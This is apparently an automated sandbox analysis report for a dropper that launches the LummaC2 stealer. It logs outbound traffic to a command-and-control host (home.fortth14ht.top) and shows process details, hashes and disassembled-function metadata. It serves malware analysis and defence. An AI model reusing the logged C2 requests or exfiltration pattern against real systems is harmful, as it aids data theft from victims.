Dec 27, 2024 08:53:19.536128044 CET	2472	OUT	Data Raw: 38 50 4a 71 65 72 32 2b 76 65 43 39 55 30 72 56 37 5c 2f 53 70 64 43 38 54 78 61 35 34 64 30 50 53 5a 64 53 6e 57 79 58 55 6f 5a 50 43 75 73 65 4b 4e 4d 6a 73 62 79 33 68 76 64 52 74 4e 58 69 76 74 4c 73 5c 2f 30 62 4b 5c 2f 45 44 67 43 74 6d 39 Data Ascii: 8PJqer2+veC9U0rV7\/SpdC8Txa54d0PSZdSnWyXUoZPCuseKNMjsby3hvdRtNXivtLs\/0bK\/EDgCtm9fhDKM7y1ZplFb+z62T4ShWoxwVSjRVWVCKhhoYSnSw9N0o1ZU5+ww86+EoVJU6uLwtOr+R5v4W+KFHIKHHudcP5xLJM8o\/wBp0c\/xuJw+JlmMK+Jnh44ibni6uNq4jFYijinQhWp\/WcXDBZjiKMKtHLsfVoehy
Dec 27, 2024 08:53:19.536231995 CET	2472	OUT	Data Raw: 39 34 4b 38 44 5c 2f 42 33 55 5c 2f 6a 58 34 75 2b 4b 36 36 6c 38 66 37 66 77 66 6f 48 68 72 53 66 48 6e 67 62 34 64 58 47 6c 58 33 68 65 37 5c 2f 5a 78 74 5c 2f 6a 4f 64 64 6e 38 51 66 45 66 77 6b 32 6e 53 57 33 77 70 75 50 44 47 70 32 56 39 64 Data Ascii: 94K8D\/B3U\/jX4u+K66l8f7fwfoHhrSfHngb4dXGlX3he7\/Zxt\/jOddn8QfEfwk2nSW3wpuPDGp2V9dvYeJbi70fWLOx\/mvxpwH0ePGXJcmy\/j7iWrCPD2JqcTZTmnD2Z5xlWc5DUdHMsqxixeIy7D1J4GljYYXNMuxeUZ3h0sRi8vr0lhP7SyuMsL\/cP0WuPfpc\/Rd4k4vx\/hPwRk2Y0OP8AKsNwLxZwn4g8NcM8Wc
Dec 27, 2024 08:53:19.656117916 CET	14832	OUT	Data Raw: 2f 77 42 61 72 66 38 41 4c 54 5c 2f 50 39 32 74 76 66 5c 2f 75 5c 2f 69 57 4d 6b 2b 37 39 5c 2f 5c 2f 50 35 6e 5c 2f 48 38 4f 4b 68 5c 2f 50 66 6e 5c 2f 50 74 6a 48 2b 63 56 50 4c 33 5c 2f 33 66 38 61 67 37 5c 2f 77 42 5c 2f 38 2b 50 35 69 73 54 Data Ascii: /wBarf8ALT\/P92tvf\/u\/iWMk+79\/\/P5n\/H8OKh\/Pfn\/PtjH+cVPL3\/3f8ag7\/wB\/8+P5isToB+v4f1NV36\/hUtQSf98f5\/z7+9B0Fdg\/9z5P+mefX2\/D\/OaY2e\/qOn+v6dverCfdH4\/zNRSR\/wB\/\/tr\/AJ69z\/kCg0+s\/wBW\/wDtRm4\/757\/AP18fpVaSP5vub383\/nr+nf\/AB6dqs\/d2
Dec 27, 2024 08:53:19.699871063 CET	27192	OUT	Data Raw: 4b 67 30 43 71 39 57 4b 6a 6b 37 66 6a 5c 2f 53 67 43 4f 69 69 69 75 67 36 43 50 6e 5a 2b 50 36 5a 5c 2f 6e 6e 39 4b 6a 71 5a 5c 2f 75 6e 38 50 35 69 6f 61 41 49 35 4f 33 34 5c 2f 30 71 75 79 39 78 2b 50 2b 4e 58 4b 59 5c 2f 54 38 66 36 47 67 36 Data Ascii: Kg0Cq9WKjk7fj\/SgCOiiiug6CPnZ+P6Z\/nn9KjqZ\/un8P5ioaAI5O34\/0quy9x+P+NXKY\/T8f6Gg6Cnsf2\/L\/AOypoXb6\/jVmo5O34\/0rSn1+X6mlPr8v1Idi+n8\/8aZIuefXg\/Xt\/n2qWitDQr0xlTvx\/X8OafRQdBXpj\/7m6pX+8fw\/kKbQaU+vyK9V60Kr0HRT6\/L9SvTH6fj\/AENSv94\/h\/IU2g0
Dec 27, 2024 08:53:19.819778919 CET	8652	OUT	Data Raw: 4a 38 53 34 72 41 78 6a 47 55 73 62 68 38 69 7a 53 74 68 49 78 6e 69 4a 34 53 45 6e 69 4b 65 46 6c 52 55 5a 59 71 6e 55 77 30 57 35 32 6c 69 4b 63 36 4b 76 55 6a 4b 4b 35 79 6f 6e 36 5c 2f 68 5c 2f 55 30 36 4f 52 4a 59 30 6c 6a 59 50 48 49 69 79 Data Ascii: J8S4rAxjGUsbh8izSthIxniJ4SEniKeFlRUZYqnUw0W52liKc6KvUjKK5yon6\/h\/U06ORJY0ljYPHIiyRuOjI6hlYezKQR9a6Pwr4K8c\/ELU73Rfh34C8ffEbW9MsE1TUtG+HXgbxZ4+1bTtMkuEtY9Rv9M8IaPrV7ZWL3UiW63d1BFbtNIkYk3soPbj8dg8vw88Zj8XhcFg6UFKrisXXpYbDUot2UqletOFKEW2knKSTbR5
Dec 27, 2024 08:53:19.859810114 CET	1236	OUT	Data Raw: 2b 44 75 68 33 73 4f 6f 57 33 68 4f 7a 75 4c 75 41 51 42 5a 62 32 4b 32 6e 4c 66 5a 34 44 62 70 35 6d 4c 61 4d 75 66 4b 4f 31 69 54 6b 6b 41 35 42 36 5c 2f 78 49 76 6f 6b 2b 49 4e 53 65 4b 68 57 38 51 63 4c 43 6c 6d 4f 5a 79 7a 4c 46 31 71 64 4c Data Ascii: +Duh3sOoW3hOzuLuAQBZb2K2nLfZ4Dbp5mLaMufKO1iTkkA5B6\/xIvok+INSeKhW8QcLClmOZyzLF1qdLHyqwjicowfC+LwMfb42vLE4SXCmGnl0ljp4vFYrNKqzvH43GThUwWJ\/0kn9PPwppVqeZUPCjGV8dgclwOTYDDYmtlTwP\/CPm+G4nyzMZUKOXYejSx3+tWEo5hWWHhh8tp5XPF5NgMqwLrYbMMF2ViLTwv8AFL4z
Dec 27, 2024 08:53:19.979660034 CET	1236	OUT	Data Raw: 5a 50 53 38 50 2b 49 61 33 44 2b 44 6e 77 72 53 79 6e 4c 70 34 5c 2f 4b 70 5c 2f 77 42 6d 34 4c 68 4e 59 33 46 30 36 53 71 51 79 66 43 2b 33 6e 6e 57 63 34 76 2b 30 63 35 57 49 6a 69 61 57 4a 78 46 66 4e 38 5a 4f 45 38 66 6d 47 42 78 4f 54 64 6a Data Ascii: ZPS8P+Ia3D+DnwrSynLp4\/Kp\/wBm4LhNY3F06SqQyfC+3nnWc4v+0c5WIjiaWJxFfN8ZOE8fmGBxOTdj+zHr+rfFrwN8F\/2tbCWx8K6d+0F\/wVa\/4I52fxI+Emn6gbK8+FP7RHhX4pfHxfjhpGl+HpVj1Gx+FPxLTXPB\/wAWvhqxbUtH0yw8a6x8NINT1DUPhpqsh8f+Cejah8V2\/bY0P9lT4K\/tYnxH4g\/ZE+KMNv
Dec 27, 2024 08:53:20.139806986 CET	1236	OUT	Data Raw: 33 69 62 77 68 38 51 66 68 68 5a 66 73 38 5c 2f 41 50 34 57 66 46 37 54 76 46 58 78 31 2b 4b 33 5c 2f 42 4e 6e 34 5c 2f 32 33 37 46 76 78 53 30 76 57 39 50 30 53 39 2b 49 30 50 6a 5c 2f 77 44 34 4b 51 65 4c 50 47 64 70 70 58 68 44 56 4c 33 55 74 Data Ascii: 3ibwh8QfhhZfs8\/AP4WfF7TvFXx1+K3\/BNn4\/237FvxS0vW9P0S9+I0Pj\/wD4KQeLPGdppXhDVL3UtItvBfx7+LH7H95418C2fgi6Nt4vPjDVvEPwYs4I\/FurW9hd51x8B7PxBrXhLWfiP48+InxVb4e+GLHwP8O7b4ieKdc8WxeA\/A+lwtDpfgvwn\/wkOp6svh\/wpp293sfD2ix6do9o8jm2soic1A\/7MfwZe+1HU
Dec 27, 2024 08:53:23.241959095 CET	157	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 07:53:23 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1 Connection: close Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49710	185.121.15.192	80	6108	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 08:53:23.514213085 CET	99	OUT	GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1 Host: home.fortth14ht.top Accept: /
Dec 27, 2024 08:53:25.046108007 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 07:53:24 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49711	185.121.15.192	80	6108	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 08:53:25.392018080 CET	172	OUT	POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1 Host: home.fortth14ht.top Accept: / Content-Type: application/json Content-Length: 31 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Dec 27, 2024 08:53:26.915072918 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 07:53:26 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49705	3.218.7.103	443	6108	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 07:53:08 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-27 07:53:08 UTC	224	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 07:53:08 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-27 07:53:08 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Target ID:	0
Start time:	02:53:02
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\Cph7VEeu1r.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Cph7VEeu1r.exe"
Imagebase:	0x8e0000
File size:	6'175'232 bytes
MD5 hash:	02E25B261F1A228DF152EEF5977C625C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:53:04
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\LummaC2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\LummaC2.exe"
Imagebase:	0x450000
File size:	299'520 bytes
MD5 hash:	607000C61FCB5A41B8D511B5ED7625D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	02:53:04
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Set-up.exe"
Imagebase:	0xaa0000
File size:	6'851'208 bytes
MD5 hash:	2A99036C44C996CEDEB2042D389FE23C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 26%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Function 059A0590 Relevance: .4, Instructions: 447COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1481526919.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59a0000_Cph7VEeu1r.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96ce07eacbde1f816e543e0bea930131d48ce497cd169be97854fbcce003d19b
Instruction ID: 26910fb557b196e1b35c743f1303bff27c5558eaa457f4d37a1f6637fbd4c0eb
Opcode Fuzzy Hash: 96ce07eacbde1f816e543e0bea930131d48ce497cd169be97854fbcce003d19b
Instruction Fuzzy Hash: 72512A70A01349CFCB05DFA8E5916AE7BF3BB85314F104569C9046B350EBB66945CFA2

Function 059A0A08 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1481526919.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59a0000_Cph7VEeu1r.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0df09d6d7963d8ca1afee157d7c3b80b754e54ee30e94d1c4a64191a5226a282
Instruction ID: 54213e336c672c6cdbd0b482c99efb9af1f6b123022454c3f3126ef9c5d021bc
Opcode Fuzzy Hash: 0df09d6d7963d8ca1afee157d7c3b80b754e54ee30e94d1c4a64191a5226a282
Instruction Fuzzy Hash: 406191317012019FCB54EB78D19DA29BBEBBB84314B558469D94A8B3A1DFB0FC41CBE0

Function 059A0848 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1481526919.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59a0000_Cph7VEeu1r.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e92f9e085b580f0b23dbba18989162bc1749a30544a67a9b2946039898f8e710
Instruction ID: fd07df64db646153650d48f033cbf24beac329f23d51f4486800ef365253a635
Opcode Fuzzy Hash: e92f9e085b580f0b23dbba18989162bc1749a30544a67a9b2946039898f8e710
Instruction Fuzzy Hash: AA410B70A01309CFCF14DFA8E5906AEBBF3BB85714F104568C9146B350EBB66945CFA2

Function 059A0C90 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1481526919.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59a0000_Cph7VEeu1r.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c86a34690325b9466decb0677a9deb913cdce0939b0fbc1c908b4450017a92d6
Instruction ID: 77126add9f5b68be722ce33e105ad54bf368d6040665f1b86c18d01a4e4bf91a
Opcode Fuzzy Hash: c86a34690325b9466decb0677a9deb913cdce0939b0fbc1c908b4450017a92d6
Instruction Fuzzy Hash: 2931E5367002598FDB00DBADE484AAEBBEAFBC4310F14812AD919D7341DB30E905CBE1

Analysis Process: LummaC2.exePID: 1920, Parent PID: 908COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	60%
Total number of Nodes:	40
Total number of Limit Nodes:	2

Executed Functions

Function 00485135 Relevance: 65.4, Strings: 52, Instructions: 388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

J, xrefs: 004853EF
9, xrefs: 0048546D
i, xrefs: 00485371
$, xrefs: 004851E2
w, xrefs: 00485443
H, xrefs: 00485156
", xrefs: 004851F0
r, xrefs: 004853E1
, xrefs: 004854DD
(, xrefs: 004855F0
], xrefs: 00485347
2, xrefs: 00485180
M, xrefs: 00485435
k, xrefs: 0048532B
R, xrefs: 0048547B
{, xrefs: 0048539B
v, xrefs: 004853A9
F, xrefs: 004856F8
x, xrefs: 00485419
4, xrefs: 004856DA
\, xrefs: 00485497
, xrefs: 004851FE
8, xrefs: 004851C6
., xrefs: 0048520C
4, xrefs: 00485172
<, xrefs: 004851AA
M, xrefs: 004853C5
C, xrefs: 0048540B
&, xrefs: 004851D4
V, xrefs: 00485363
n, xrefs: 004854B3
D, xrefs: 0048545F
*, xrefs: 00485228
f, xrefs: 004854C1
>, xrefs: 0048519C
3, xrefs: 00485427
(, xrefs: 00485236
,, xrefs: 0048521A
W, xrefs: 0048537F
:, xrefs: 004851B8
G, xrefs: 004853FD
*, xrefs: 004855E8
^, xrefs: 004854A5
f, xrefs: 004854CF
6, xrefs: 00485164
F, xrefs: 004853D3
J, xrefs: 00485148
h, xrefs: 00485489
0, xrefs: 0048518E
E, xrefs: 004856F4
l, xrefs: 00485355
t, xrefs: 00485451

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: $ $"$$$&$($($*$*$,$.$0$2$3$4$4$6$8$9$:$<$>$C$D$E$F$F$G$H$J$J$M$M$R$V$W$\$]$^$f$f$h$i$k$l$n$r$t$v$w$x${
API String ID: 0-1337114936
Opcode ID: dce7dc6631597fd2ff7a3c991bc86d072c8ea293b3a33a62b68c6eb68b3d4c96
Instruction ID: b510ef24f0e344f48581a9ca7b94de73bb6c6bbdf4305faf5d8ec75b2b1d0606
Opcode Fuzzy Hash: dce7dc6631597fd2ff7a3c991bc86d072c8ea293b3a33a62b68c6eb68b3d4c96
Instruction Fuzzy Hash: 612240219087E989DB32C67C8C087CDBEA15B27324F0847D9D1E96B3D2D7750B86CB66

Function 00458720 Relevance: 7.7, APIs: 5, Instructions: 235
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00458744
GetCurrentThreadId.KERNEL32 ref: 0045874E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00458808
GetForegroundWindow.USER32 ref: 004589A1
ExitProcess.KERNEL32 ref: 00458A17

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: c6b2f2fb54a80d0080f4af5518d89e220b2fda8d9e7b9d77f7c983c32d102146
Instruction ID: b825722f0122866ae4be4b7102c0f3126e7f1a6658a5d70958f2c417f192c6a3
Opcode Fuzzy Hash: c6b2f2fb54a80d0080f4af5518d89e220b2fda8d9e7b9d77f7c983c32d102146
Instruction Fuzzy Hash: 39715873E043144BD318EE69DC4135AB6C79BC0714F1F813EA995EB3A5DE798C05839A

Function 0048BAD0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0048EA7B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0048BAFE

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0048C59C Relevance: 1.3, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

9., xrefs: 0048C5F0

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: 9.
API String ID: 2994545307-3220845746
Opcode ID: 3e661f4c4f150f71e54b4ad3dda336d9835b02ad1f2e5c405e9773d256656967
Instruction ID: 5ce25ce9da98cbb7e0df1d1f98f8e3fb2e93a78409e6030be8176f4cd85900ea
Opcode Fuzzy Hash: 3e661f4c4f150f71e54b4ad3dda336d9835b02ad1f2e5c405e9773d256656967
Instruction Fuzzy Hash: 6A11E530A002208BDB149F28DC94BBF77E1FB56324F28AA79D851B73E1D7749C018B58

Function 0048EEC0 Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b93939b74d8d7b64bf75f9a9355cf1a2bdbf8f8e5bbe796e12252ee0c7825725
Instruction ID: f94b35b8f8d9c0cebe7db3af2b90a1b17af8f7ed6bf18eb140dfa4c72b8c57dc
Opcode Fuzzy Hash: b93939b74d8d7b64bf75f9a9355cf1a2bdbf8f8e5bbe796e12252ee0c7825725
Instruction Fuzzy Hash: 9D413971205304AFE7289F29DCC1B7FB3A6EB9A718F24493EE28597251CA34BC11C749

Function 0048BC91 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0048BCA2

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: f69004e0f5ba05f88bbb1f1b4be432bdfaab24cb7f1744ddd94a2578599fe5ea
Instruction ID: 68f920f38fb0881ad13fd6e3530303e6befa6ff19e27fd8c54708d825eacfd0a
Opcode Fuzzy Hash: f69004e0f5ba05f88bbb1f1b4be432bdfaab24cb7f1744ddd94a2578599fe5ea
Instruction Fuzzy Hash: 2CE04FB5A125459FCB48CF69EC904B977B1E769314714457EE503C7360DB389902CB09

Function 0048A080 Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,7B1647F3,004588F3,10130D9D), ref: 0048A090

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7393be66fe425e9a4693d1f840cc37cc312f84328419f5f66d94610f3b1d298c
Instruction ID: 8f2d580e83e97b86746e800b83e90e54eaca0b45f151b201558ea84cc3e4f4a7
Opcode Fuzzy Hash: 7393be66fe425e9a4693d1f840cc37cc312f84328419f5f66d94610f3b1d298c
Instruction Fuzzy Hash: 6DC04C31445121AAC6142B15EC09FCA3F54EF46354F154495B404660B18A616C828698

Non-executed Functions

Function 0048483C Relevance: 34.0, Strings: 27, Instructions: 298
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0, xrefs: 00484B4D
0, xrefs: 004849A2
>, xrefs: 00484A43
>, xrefs: 0048498A
t, xrefs: 0048484F
3, xrefs: 0048499E
2, xrefs: 0048499A
:, xrefs: 0048497A
f, xrefs: 004848B1
8, xrefs: 00484982
`, xrefs: 004848A3
n, xrefs: 00484879
d, xrefs: 004848BF
j, xrefs: 0048485D
), xrefs: 00484946
<, xrefs: 00484992
f, xrefs: 00484A8C
?, xrefs: 004848F0
], xrefs: 00484A94
